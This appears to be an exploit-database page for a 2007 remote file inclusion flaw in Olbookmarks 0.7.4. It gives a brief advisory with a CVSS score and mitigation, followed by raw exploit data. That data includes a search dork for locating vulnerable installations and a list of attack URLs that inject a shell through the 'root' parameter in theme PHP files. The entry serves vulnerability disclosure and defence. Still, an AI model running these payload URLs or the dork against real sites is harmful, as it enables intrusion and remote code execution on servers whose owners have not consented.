header-logo
Suggest Exploit
vendor:
Olbookmarks
by:
ThE TiGeR
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Olbookmarks
Affected Version From: Olbookmarks 0.7.4
Affected Version To: Olbookmarks 0.7.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Olbookmarks 0.7.4 multiple RFI (root)

The Olbookmarks 0.7.4 version is vulnerable to multiple Remote File Inclusion (RFI) attacks. An attacker can exploit these vulnerabilities by injecting malicious code via the 'root' parameter in various PHP files.

Mitigation:

Update to a patched version of Olbookmarks or apply appropriate security measures to prevent RFI attacks.
Source

Exploit-DB raw data:

#Olbookmarks =>0.7.4 multiple RFI (root)

Download script :

#D0rk : allintitle:ol'bookmarks

#Thanks Str0ke

#Exploit : http://mesh.dl.sourceforge.net/sourceforge/olbookmarks/olbookmarks-0.7.4.tar.gz

#http://victime.com/olbookmarks-0.7.4/themes/test1.php?root=shell

#http://victime.com/path/themes/blackorange.php?root=shell

#http://victime.com/path/theme/default.php?root=shell

#http://victime.com/path/theme/frames1.php?root=shell

#http://victime.com/path/theme/frames1_top.php?root=shell

#http://victime.com/path/theme/test1.php?root=shell

#http://victime.com/path/theme/test2.php?root=shell

#http://victime.com/path/theme/test3.php?root=shell

#http://victime.com/path/theme/test4.php?root=shell

#http://victime.com/path/theme/test5.php?root=shell

#http://victime.com/path/theme/test6.php?root=shell

#http://victime.com/path/theme/frames1_left.php?root=shell

#http://victime.com/path/theme/frames1_center.php?root=shell

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail[dot]com

# milw0rm.com [2007-05-21]